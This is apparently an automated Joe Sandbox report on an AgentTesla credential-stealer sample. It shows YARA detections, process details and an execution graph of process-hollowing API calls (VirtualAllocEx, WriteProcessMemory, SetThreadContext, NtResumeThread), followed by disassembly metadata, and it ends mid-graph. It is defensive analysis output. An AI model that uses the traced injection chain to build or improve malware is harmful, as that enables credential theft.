                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:21:02:11
                                                                                                        Start date:12/01/2025
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0x6c0000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2925812207.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2925812207.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2925812207.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2925812207.0000000002A1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:12.3%
                                                                                                          Dynamic/Decrypted Code Coverage:99.2%
                                                                                                          Signature Coverage:3%
                                                                                                          Total number of Nodes:237
                                                                                                          Total number of Limit Nodes:4
                                                                                                          execution_graph 68709 18036c8 68710 18036e5 68709->68710 68711 18036f5 68710->68711 68713 6da9ae2 68710->68713 68714 6da9b01 68713->68714 68717 6dad788 68714->68717 68719 6dad7af 68717->68719 68721 6dadbd8 68719->68721 68722 6dadc20 VirtualProtect 68721->68722 68724 6da01d1 68722->68724 68729 158d030 68730 158d048 68729->68730 68731 158d0a3 68730->68731 68733 6dae1e0 68730->68733 68734 6dae208 68733->68734 68737 6dae670 68734->68737 68735 6dae22f 68738 6dae69d 68737->68738 68739 6dad788 VirtualProtect 68738->68739 68741 6dae833 68738->68741 68740 6dae824 68739->68740 68740->68735 68741->68735 68420 6d38e5e 68421 6d3870a 68420->68421 68424 6d8ee28 68421->68424 68428 6d8ee18 68421->68428 68425 6d8ee3d 68424->68425 68427 6d8ee53 68425->68427 68432 6d8f21d 68425->68432 68427->68421 68429 6d8ee28 68428->68429 68430 6d8ee53 68429->68430 68431 6d8f21d 10 API calls 68429->68431 68430->68421 68431->68430 68433 6d8f223 68432->68433 68438 6430b81 68433->68438 68454 6430b90 68433->68454 68468 6430b39 68433->68468 68434 6d8eec5 68439 6430be0 68438->68439 68440 6430b8a 68438->68440 68513 6431378 68439->68513 68444 6430b81 10 API calls 68440->68444 68483 6430c89 68440->68483 68486 6430be0 68440->68486 68489 6430cf5 68440->68489 68492 6430e2b 68440->68492 68495 6430f40 68440->68495 68498 6430faf 68440->68498 68501 6430cc1 68440->68501 68504 6430eac 68440->68504 68507 6430c62 68440->68507 68510 6430bcf 68440->68510 68441 6430bc7 68441->68434 68444->68441 68455 6430ba5 68454->68455 68457 6430c62 10 API calls 68455->68457 68458 6430cc1 10 API calls 68455->68458 68459 6430b81 10 API calls 68455->68459 68460 6430f40 10 API calls 68455->68460 68461 6430be0 10 API calls 68455->68461 68462 6430cf5 10 API calls 68455->68462 68463 6430e2b 10 API calls 68455->68463 68464 6430c89 10 API calls 68455->68464 68465 6430faf 10 API calls 68455->68465 68466 6430bcf 10 API calls 68455->68466 68467 6430eac 10 API calls 68455->68467 68456 6430bc7 68456->68434 68457->68456 68458->68456 68459->68456 68460->68456 68461->68456 68462->68456 68463->68456 68464->68456 68465->68456 68466->68456 68467->68456 68469 6430b47 68468->68469 68470 6430b89 68468->68470 68469->68434 68472 6430c62 10 API calls 68470->68472 68473 6430cc1 10 API calls 68470->68473 68474 6430b81 10 API calls 68470->68474 68475 6430f40 10 API calls 68470->68475 68476 6430be0 10 API calls 68470->68476 68477 6430cf5 10 API calls 68470->68477 68478 6430e2b 10 API calls 68470->68478 68479 6430c89 10 API calls 68470->68479 68480 6430faf 10 API calls 68470->68480 68481 6430bcf 10 API calls 68470->68481 68482 6430eac 10 API calls 68470->68482 68471 6430bc7 68471->68434 68472->68471 68473->68471 68474->68471 68475->68471 68476->68471 68477->68471 68478->68471 68479->68471 68480->68471 68481->68471 68482->68471 68484 6430c45 68483->68484 68485 6431378 10 API calls 68484->68485 68485->68484 68487 6430c0d 68486->68487 68488 6431378 10 API calls 68487->68488 68488->68487 68490 6430c4b 68489->68490 68491 6431378 10 API calls 68490->68491 68491->68490 68493 6430c4b 68492->68493 68494 6431378 10 API calls 68493->68494 68494->68493 68496 6430c4b 68495->68496 68497 6431378 10 API calls 68496->68497 68497->68496 68499 6430c4b 68498->68499 68500 6431378 10 API calls 68499->68500 68500->68499 68502 6430c4b 68501->68502 68503 6431378 10 API calls 68502->68503 68503->68502 68505 6430c4b 68504->68505 68506 6431378 10 API calls 68505->68506 68506->68505 68508 6430c16 68507->68508 68509 6431378 10 API calls 68508->68509 68509->68508 68511 6430bdf 68510->68511 68512 6431378 10 API calls 68511->68512 68512->68511 68514 643139d 68513->68514 68520 64313bf 68514->68520 68530 6431862 68514->68530 68535 64315d3 68514->68535 68540 64318fc 68514->68540 68545 6431c53 68514->68545 68550 6432313 68514->68550 68555 6431b8d 68514->68555 68560 64321cc 68514->68560 68565 64321af 68514->68565 68571 643236d 68514->68571 68576 643180f 68514->68576 68581 6432229 68514->68581 68586 6431d08 68514->68586 68591 6432722 68514->68591 68596 643252b 68514->68596 68520->68439 68531 643187a 68530->68531 68601 6432cc8 68531->68601 68605 6432cb8 68531->68605 68532 6431892 68536 64315e2 68535->68536 68622 643afb8 68536->68622 68626 643afb0 68536->68626 68537 643144d 68537->68520 68541 6431906 68540->68541 68630 643bdd8 68541->68630 68634 643bde0 68541->68634 68542 643144d 68542->68520 68546 643224f 68545->68546 68547 643144d 68545->68547 68638 643b558 68546->68638 68642 643b550 68546->68642 68547->68520 68551 643144d 68550->68551 68552 643224f 68550->68552 68551->68520 68553 643b550 VirtualAllocEx 68552->68553 68554 643b558 VirtualAllocEx 68552->68554 68553->68551 68554->68551 68556 6431b9c 68555->68556 68558 643b550 VirtualAllocEx 68556->68558 68559 643b558 VirtualAllocEx 68556->68559 68557 6431c0c 68558->68557 68559->68557 68561 643144d 68560->68561 68562 6431922 68560->68562 68561->68520 68563 643bde0 NtResumeThread 68562->68563 68564 643bdd8 NtResumeThread 68562->68564 68563->68561 68564->68561 68566 64321bc 68565->68566 68567 6431b8c 68565->68567 68569 643b550 VirtualAllocEx 68567->68569 68570 643b558 VirtualAllocEx 68567->68570 68568 6431c0c 68569->68568 68570->68568 68575 6432380 68571->68575 68572 643144d 68572->68520 68573 643afb0 Wow64SetThreadContext 68573->68572 68574 643afb8 Wow64SetThreadContext 68574->68572 68575->68573 68575->68574 68577 6432370 68576->68577 68578 643144d 68576->68578 68579 643afb0 Wow64SetThreadContext 68577->68579 68580 643afb8 Wow64SetThreadContext 68577->68580 68578->68520 68579->68578 68580->68578 68582 6432233 68581->68582 68584 643b550 VirtualAllocEx 68582->68584 68585 643b558 VirtualAllocEx 68582->68585 68583 643144d 68583->68520 68584->68583 68585->68583 68587 6431d17 68586->68587 68646 643b7c2 68587->68646 68650 643b7c8 68587->68650 68588 643144d 68588->68520 68592 6432731 68591->68592 68594 643b7c2 WriteProcessMemory 68592->68594 68595 643b7c8 WriteProcessMemory 68592->68595 68593 643144d 68593->68520 68594->68593 68595->68593 68597 643253a 68596->68597 68599 643b7c2 WriteProcessMemory 68597->68599 68600 643b7c8 WriteProcessMemory 68597->68600 68598 643144d 68598->68520 68599->68598 68600->68598 68602 6432cdf 68601->68602 68603 6432d01 68602->68603 68609 64335f8 68602->68609 68603->68532 68606 6432d01 68605->68606 68607 6432cc3 68605->68607 68606->68532 68607->68606 68608 64335f8 2 API calls 68607->68608 68608->68606 68610 6433607 68609->68610 68614 6439306 68610->68614 68618 6439310 68610->68618 68615 6439310 CreateProcessA 68614->68615 68617 64394fc 68615->68617 68619 6439374 CreateProcessA 68618->68619 68621 64394fc 68619->68621 68623 643affd Wow64SetThreadContext 68622->68623 68625 643b045 68623->68625 68625->68537 68627 643afb8 Wow64SetThreadContext 68626->68627 68629 643b045 68627->68629 68629->68537 68631 643bdbe 68630->68631 68631->68630 68632 643be35 NtResumeThread 68631->68632 68633 643be5d 68632->68633 68633->68542 68635 643be1f NtResumeThread 68634->68635 68637 643be5d 68635->68637 68637->68542 68639 643b598 VirtualAllocEx 68638->68639 68641 643b5d5 68639->68641 68641->68547 68643 643b558 VirtualAllocEx 68642->68643 68645 643b5d5 68643->68645 68645->68547 68647 643b7c8 WriteProcessMemory 68646->68647 68649 643b867 68647->68649 68649->68588 68651 643b810 WriteProcessMemory 68650->68651 68653 643b867 68651->68653 68653->68588 68658 6d38cc3 68659 6d38ccd 68658->68659 68665 6d88c40 68659->68665 68670 6d88c31 68659->68670 68660 6d3870a 68661 6d8ee18 10 API calls 68660->68661 68662 6d8ee28 10 API calls 68660->68662 68661->68660 68662->68660 68666 6d88c55 68665->68666 68667 6d88c6b 68666->68667 68675 6d8adcd 68666->68675 68680 6d8b0ba 68666->68680 68667->68660 68671 6d88c40 68670->68671 68672 6d88c6b 68671->68672 68673 6d8b0ba 2 API calls 68671->68673 68674 6d8adcd 2 API calls 68671->68674 68672->68660 68673->68672 68674->68672 68676 6d8b0bb 68675->68676 68685 6d8de2c 68676->68685 68689 6d8de38 68676->68689 68681 6d8b0c0 68680->68681 68683 6d8de38 CopyFileA 68681->68683 68684 6d8de2c CopyFileA 68681->68684 68682 6d89ef3 68682->68667 68683->68682 68684->68682 68686 6d8de38 CopyFileA 68685->68686 68688 6d8df8f 68686->68688 68690 6d8de8d CopyFileA 68689->68690 68692 6d8df8f 68690->68692 68742 6d83da8 68743 6d83df0 VirtualProtect 68742->68743 68745 6d83e2b 68743->68745 68750 6d38721 68753 6d3870a 68750->68753 68751 6d8ee18 10 API calls 68751->68753 68752 6d8ee28 10 API calls 68752->68753 68753->68751 68753->68752 68693 6daebc0 68694 6daec00 VirtualAlloc 68693->68694 68696 6daec3a 68694->68696

                                                                                                          Executed Functions

                                                                                                          Function 06D3DE4D Relevance: 16.1, Strings: 12, Instructions: 1139COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-312445597
                                                                                                          • Opcode ID: e90705bb8ac6d31a8d69300966c2bf8aa0a1c3a4e1f65f726c51d6a3538aba5a
                                                                                                          • Instruction ID: 8d956c0886372130e5db0776f60833d53068acfd82ecdb004e41967851d6b3a3
                                                                                                          • Opcode Fuzzy Hash: e90705bb8ac6d31a8d69300966c2bf8aa0a1c3a4e1f65f726c51d6a3538aba5a
                                                                                                          • Instruction Fuzzy Hash: 7DB2F834A002288FDB54CFA9C994BADB7B6FF88700F158596E505AB3A5DB70EC85CF50
                                                                                                          Function 06D3E177 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2546334966
                                                                                                          • Opcode ID: 9491672cc29e0660ac441b86af1a2e2760d14625ee5af8c94e46955dcb066cf5
                                                                                                          • Instruction ID: cd2c0268d789c83c9af255de1a3d6001b0e7ce7f46d85f58586e24c744974283
                                                                                                          • Opcode Fuzzy Hash: 9491672cc29e0660ac441b86af1a2e2760d14625ee5af8c94e46955dcb066cf5
                                                                                                          • Instruction Fuzzy Hash: 8E22DA74A00225CFDB64CFA5C994BADB7B2FF88304F1581A6E509AB3A5DB709D81CF50
                                                                                                          Function 01807690 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 634 1807690-18076b1 635 18076b3 634->635 636 18076b8-180779f 634->636 635->636 638 1807ea1-1807ec9 636->638 639 18077a5-18078e6 call 1803d58 636->639 642 18085cf-18085d8 638->642 685 1807e6a-1807e94 639->685 686 18078ec-1807947 639->686 643 1807ed7-1807ee1 642->643 644 18085de-18085f5 642->644 646 1807ee3 643->646 647 1807ee8-1807fdc call 1803d58 643->647 646->647 668 1808006 647->668 669 1807fde-1807fea 647->669 670 180800c-180802c 668->670 671 1807ff4-1807ffa 669->671 672 1807fec-1807ff2 669->672 677 180808c-180810c 670->677 678 180802e-1808087 670->678 674 1808004 671->674 672->674 674->670 696 1808163-18081a6 call 1803d58 677->696 697 180810e-1808161 677->697 691 18085cc 678->691 699 1807e96 685->699 700 1807e9e-1807e9f 685->700 693 1807949 686->693 694 180794c-1807957 686->694 691->642 693->694 698 1807d7f-1807d85 694->698 725 18081b1-18081ba 696->725 697->725 702 1807d8b-1807e07 call 1802df4 698->702 703 180795c-180797a 698->703 699->700 700->638 745 1807e54-1807e5a 702->745 705 18079d1-18079e6 703->705 706 180797c-1807980 703->706 710 18079e8 705->710 711 18079ed-1807a03 705->711 706->705 712 1807982-180798d 706->712 710->711 715 1807a05 711->715 716 1807a0a-1807a21 711->716 717 18079c3-18079c9 712->717 715->716 720 1807a23 716->720 721 1807a28-1807a3e 716->721 722 18079cb-18079cc 717->722 723 180798f-1807993 717->723 720->721 728 1807a40 721->728 729 1807a45-1807a4c 721->729 724 1807a4f-1807aba 722->724 726 1807995 723->726 727 1807999-18079b1 723->727 735 1807abc-1807ac8 724->735 736 1807ace-1807c83 724->736 731 180821a-1808229 725->731 726->727 733 18079b3 727->733 734 18079b8-18079c0 727->734 728->729 729->724 737 180822b-18082b3 731->737 738 18081bc-18081e4 731->738 733->734 734->717 735->736 743 1807c85-1807c89 736->743 744 1807ce7-1807cfc 736->744 773 180842c-1808438 737->773 740 18081e6 738->740 741 18081eb-1808214 738->741 740->741 741->731 743->744 747 1807c8b-1807c9a 743->747 751 1807d03-1807d24 744->751 752 1807cfe 744->752 749 1807e09-1807e51 745->749 750 1807e5c-1807e62 745->750 756 1807cd9-1807cdf 747->756 749->745 750->685 753 1807d26 751->753 754 1807d2b-1807d4a 751->754 752->751 753->754 757 1807d51-1807d71 754->757 758 1807d4c 754->758 760 1807ce1-1807ce2 756->760 761 1807c9c-1807ca0 756->761 766 1807d73 757->766 767 1807d78 757->767 758->757 768 1807d7c 760->768 764 1807ca2-1807ca6 761->764 765 1807caa-1807ccb 761->765 764->765 769 1807cd2-1807cd6 765->769 770 1807ccd 765->770 766->767 767->768 768->698 769->756 770->769 775 18082b8-18082c1 773->775 776 180843e-1808499 773->776 777 18082c3 775->777 778 18082ca-1808420 775->778 791 18084d0-18084fa 776->791 792 180849b-18084ce 776->792 777->778 780 18082d0-1808310 777->780 781 1808315-1808355 777->781 782 180835a-180839a 777->782 783 180839f-18083df 777->783 793 1808426 778->793 780->793 781->793 782->793 783->793 800 1808503-1808596 791->800 792->800 793->773 804 180859d-18085bd 800->804 804->691
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &Eq|$TJcq$Te^q$pbq$xbaq
                                                                                                          • API String ID: 0-1002399430
                                                                                                          • Opcode ID: d69987ad2b3d41c2a4bb5e07a738a7cae4a5eb8abd5399a7262e56ff3fe50db6
                                                                                                          • Instruction ID: 0748e1494a17e063155bd2fccb4fe40724af7fe40913e148892668826410e9e7
                                                                                                          • Opcode Fuzzy Hash: d69987ad2b3d41c2a4bb5e07a738a7cae4a5eb8abd5399a7262e56ff3fe50db6
                                                                                                          • Instruction Fuzzy Hash: 6DA2B875E00228CFDB65CF69C984A99BBB2FF89304F1581D9D509AB365DB31AE81CF40
                                                                                                          Function 06D31C4A Relevance: 6.9, Strings: 4, Instructions: 1915COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 806 6d31c4a-6d32009 846 6d32010-6d3203a 806->846 847 6d3200b 806->847 1024 6d32040 call 6d34948 846->1024 1025 6d32040 call 6d34938 846->1025 847->846 849 6d32046-6d323ce 870 6d323d0 849->870 871 6d323d5-6d325d3 849->871 870->871 884 6d325d5 871->884 885 6d325da-6d327c6 871->885 884->885 898 6d327c8 885->898 899 6d327cd-6d329b6 885->899 898->899 912 6d329b8 899->912 913 6d329bd-6d339db 899->913 912->913 1024->849 1025->849
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $ 9p$TJcq$$^q$$^q
                                                                                                          • API String ID: 0-266804612
                                                                                                          • Opcode ID: b24853e6f7bed09e09b07a7586801cbb04e15f7e650ce1a7783ace58da86ed77
                                                                                                          • Instruction ID: 0aa7dfddc323a810a2a5d3222c18db9418d4ea98a5ea773910680584aaa62c31
                                                                                                          • Opcode Fuzzy Hash: b24853e6f7bed09e09b07a7586801cbb04e15f7e650ce1a7783ace58da86ed77
                                                                                                          • Instruction Fuzzy Hash: B413D67A600105EFCB569F94DD48E957BB2FF8D318B0681D4E209AB276C736D8A1EF40
                                                                                                          Function 01809AA0 Relevance: 3.8, Strings: 2, Instructions: 1341COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1395 1809aa0-1809ade 1396 1809ae0 1395->1396 1397 1809ae5-1809c07 1395->1397 1396->1397 1401 1809c09-1809c25 call 180c640 1397->1401 1402 1809c2b-1809c37 1397->1402 1401->1402 1403 1809c39 1402->1403 1404 1809c3e-1809c43 1402->1404 1403->1404 1406 1809c45-1809c51 1404->1406 1407 1809c7b-1809cc4 1404->1407 1408 1809c53 1406->1408 1409 1809c58-1809c76 1406->1409 1415 1809cc6 1407->1415 1416 1809ccb-1809f90 1407->1416 1408->1409 1410 180b3df-180b3e5 1409->1410 1412 180b410 1410->1412 1413 180b3e7-180b407 1410->1413 1413->1412 1415->1416 1442 180a9c0-180a9cc 1416->1442 1443 180a9d2-180aa0a 1442->1443 1444 1809f95-1809fa1 1442->1444 1453 180aae4-180aaea 1443->1453 1445 1809fa3 1444->1445 1446 1809fa8-180a0cd 1444->1446 1445->1446 1481 180a10d-180a196 1446->1481 1482 180a0cf-180a107 1446->1482 1454 180aaf0-180ab28 1453->1454 1455 180aa0f-180aa8c 1453->1455 1465 180ae86-180ae8c 1454->1465 1470 180aa8e-180aa92 1455->1470 1471 180aabf-180aae1 1455->1471 1468 180ae92-180aeda 1465->1468 1469 180ab2d-180ad2f 1465->1469 1478 180af55-180afa0 1468->1478 1479 180aedc-180af4f 1468->1479 1562 180ad35-180adc9 1469->1562 1563 180adce-180add2 1469->1563 1470->1471 1474 180aa94-180aabc 1470->1474 1471->1453 1474->1471 1499 180b3a9-180b3af 1478->1499 1479->1478 1509 180a1a5-180a229 1481->1509 1510 180a198-180a1a0 1481->1510 1482->1481 1502 180afa5-180b027 1499->1502 1503 180b3b5-180b3dd 1499->1503 1522 180b029-180b044 1502->1522 1523 180b04f-180b05b 1502->1523 1503->1410 1536 180a238-180a2bc 1509->1536 1537 180a22b-180a233 1509->1537 1512 180a9b1-180a9bd 1510->1512 1512->1442 1522->1523 1525 180b062-180b06e 1523->1525 1526 180b05d 1523->1526 1527 180b070-180b07c 1525->1527 1528 180b081-180b090 1525->1528 1526->1525 1532 180b390-180b3a6 1527->1532 1533 180b092 1528->1533 1534 180b099-180b371 1528->1534 1532->1499 1533->1534 1538 180b266-180b2ce 1533->1538 1539 180b1f8-180b261 1533->1539 1540 180b18a-180b1f3 1533->1540 1541 180b10d-180b185 1533->1541 1542 180b09f-180b108 1533->1542 1569 180b37c-180b388 1534->1569 1585 180a2cb-180a34f 1536->1585 1586 180a2be-180a2c6 1536->1586 1537->1512 1574 180b342-180b348 1538->1574 1539->1569 1540->1569 1541->1569 1542->1569 1587 180ae6d-180ae83 1562->1587 1570 180add4-180ae2d 1563->1570 1571 180ae2f-180ae6c 1563->1571 1569->1532 1570->1587 1571->1587 1577 180b2d0-180b32e 1574->1577 1578 180b34a-180b354 1574->1578 1590 180b330 1577->1590 1591 180b335-180b33f 1577->1591 1578->1569 1600 180a351-180a359 1585->1600 1601 180a35e-180a3e2 1585->1601 1586->1512 1587->1465 1590->1591 1591->1574 1600->1512 1607 180a3f1-180a475 1601->1607 1608 180a3e4-180a3ec 1601->1608 1614 180a484-180a508 1607->1614 1615 180a477-180a47f 1607->1615 1608->1512 1621 180a517-180a59b 1614->1621 1622 180a50a-180a512 1614->1622 1615->1512 1628 180a5aa-180a62e 1621->1628 1629 180a59d-180a5a5 1621->1629 1622->1512 1635 180a630-180a638 1628->1635 1636 180a63d-180a6c1 1628->1636 1629->1512 1635->1512 1642 180a6d0-180a754 1636->1642 1643 180a6c3-180a6cb 1636->1643 1649 180a763-180a7e7 1642->1649 1650 180a756-180a75e 1642->1650 1643->1512 1656 180a7f6-180a87a 1649->1656 1657 180a7e9-180a7f1 1649->1657 1650->1512 1663 180a889-180a90d 1656->1663 1664 180a87c-180a884 1656->1664 1657->1512 1670 180a91c-180a9a0 1663->1670 1671 180a90f-180a917 1663->1671 1664->1512 1677 180a9a2-180a9aa 1670->1677 1678 180a9ac-180a9ae 1670->1678 1671->1512 1677->1512 1678->1512
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1917776226.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1800000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 2$$^q
                                                                                                          • API String ID: 0-1071376767
                                                                                                          • Opcode ID: a74dd28f2d760fc147b78ea4242f1a4011a5c3edb2f4971fbcebdb236b680e57
                                                                                                          • Instruction ID: eb9f5f7f34cdadc3cfa993314799decb7ad886fce42baecc8a257f11d99737df
                                                                                                          • Opcode Fuzzy Hash: a74dd28f2d760fc147b78ea4242f1a4011a5c3edb2f4971fbcebdb236b680e57
                                                                                                          • Instruction Fuzzy Hash: 8EE2D278A002298FCB65DF69D88479EBBF2FB89304F1081E9D519AB354DB349E85CF41
                                                                                                          Function 06435180 Relevance: 3.1, Strings: 2, Instructions: 610COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1814 6435180-64351a1 1815 64351a3 1814->1815 1816 64351a8-6435238 call 6435cc0 1814->1816 1815->1816 1821 643523e-643527b 1816->1821 1823 643528a 1821->1823 1824 643527d-6435288 1821->1824 1825 6435294-64353af 1823->1825 1824->1825 1836 64353c1-64353ec 1825->1836 1837 64353b1-64353b7 1825->1837 1838 6435ba0-6435bbc 1836->1838 1837->1836 1839 6435bc2-6435bdd 1838->1839 1840 64353f1-6435554 call 6433d88 1838->1840 1851 6435566-64356e3 1840->1851 1852 6435556-643555c 1840->1852 1862 64356e5-64356e9 1851->1862 1863 6435748-6435752 1851->1863 1852->1851 1864 64356f1-6435743 1862->1864 1865 64356eb-64356ec 1862->1865 1866 6435979-6435998 1863->1866 1867 6435a1e-6435a89 1864->1867 1865->1867 1868 6435757-643589d call 6433d88 1866->1868 1869 643599e-64359c8 1866->1869 1886 6435a9b-6435ae6 1867->1886 1887 6435a8b-6435a91 1867->1887 1898 64358a3-643596f call 6433d88 1868->1898 1899 6435972-6435973 1868->1899 1875 6435a1b-6435a1c 1869->1875 1876 64359ca-6435a18 1869->1876 1875->1867 1876->1875 1889 6435b85-6435b9d 1886->1889 1890 6435aec-6435b84 1886->1890 1887->1886 1889->1838 1890->1889 1898->1899 1899->1866
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$8
                                                                                                          • API String ID: 0-89531850
                                                                                                          • Opcode ID: be5603d8b6db5aa7cfdcf4e44f98d9f47b1dca2863555846af9ff743fc5d012a
                                                                                                          • Instruction ID: 13c149a263044a37c8e5bc1e97a1a80b1204bd7e0b27c5434c9318b0e1a21e82
                                                                                                          • Opcode Fuzzy Hash: be5603d8b6db5aa7cfdcf4e44f98d9f47b1dca2863555846af9ff743fc5d012a
                                                                                                          • Instruction Fuzzy Hash: FC52E675E002298FDBA4DF69C850AD9B7B1FB89304F1482EAD509B7354DB34AE81CF90
                                                                                                          Function 06B8DA45 Relevance: 3.1, Strings: 2, Instructions: 566COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2150 6b8da45 2151 6b8da4d-6b8da57 2150->2151 2153 6b8da59-6b8da77 2151->2153 2154 6b8da7d-6b8da80 2151->2154 2153->2154 2159 6b8dc4e-6b8dc99 2153->2159 2155 6b8dc05-6b8dc0c 2154->2155 2156 6b8da86-6b8da8c 2154->2156 2156->2155 2157 6b8da92-6b8da9b 2156->2157 2162 6b8da9d-6b8daac 2157->2162 2163 6b8dad3-6b8dad9 2157->2163 2177 6b8dc9b-6b8dca8 2159->2177 2178 6b8dcd2-6b8dcd4 2159->2178 2162->2163 2171 6b8daae-6b8dac7 2162->2171 2165 6b8dadf-6b8dae8 2163->2165 2166 6b8dbe4-6b8dbea 2163->2166 2165->2166 2172 6b8daee-6b8dafa 2165->2172 2166->2155 2168 6b8dbec-6b8dbfc 2166->2168 2168->2155 2176 6b8dbfe-6b8dc03 2168->2176 2171->2163 2180 6b8dac9-6b8dacc 2171->2180 2181 6b8db98-6b8dbdc 2172->2181 2182 6b8db00-6b8db28 2172->2182 2176->2155 2177->2178 2185 6b8dcaa-6b8dcd0 2177->2185 2183 6b8e11f-6b8e126 2178->2183 2180->2163 2181->2166 2182->2181 2194 6b8db2a-6b8db67 2182->2194 2185->2178 2197 6b8dcd9-6b8dd0d 2185->2197 2194->2181 2206 6b8db69-6b8db96 2194->2206 2207 6b8ddb0-6b8ddbf 2197->2207 2208 6b8dd13-6b8dd1c 2197->2208 2206->2166 2214 6b8ddfe 2207->2214 2215 6b8ddc1-6b8ddd7 2207->2215 2209 6b8dd22-6b8dd35 2208->2209 2210 6b8e127-6b8e137 2208->2210 2219 6b8dd9e-6b8ddaa 2209->2219 2220 6b8dd37-6b8dd50 2209->2220 2218 6b8de00-6b8de05 2214->2218 2225 6b8ddd9-6b8ddf5 2215->2225 2226 6b8ddf7-6b8ddfc 2215->2226 2222 6b8de48-6b8de64 2218->2222 2223 6b8de07-6b8de28 2218->2223 2219->2207 2219->2208 2220->2219 2236 6b8dd52-6b8dd60 2220->2236 2232 6b8de6a-6b8de73 2222->2232 2233 6b8df2c-6b8df35 2222->2233 2223->2222 2240 6b8de2a 2223->2240 2225->2218 2226->2218 2232->2210 2239 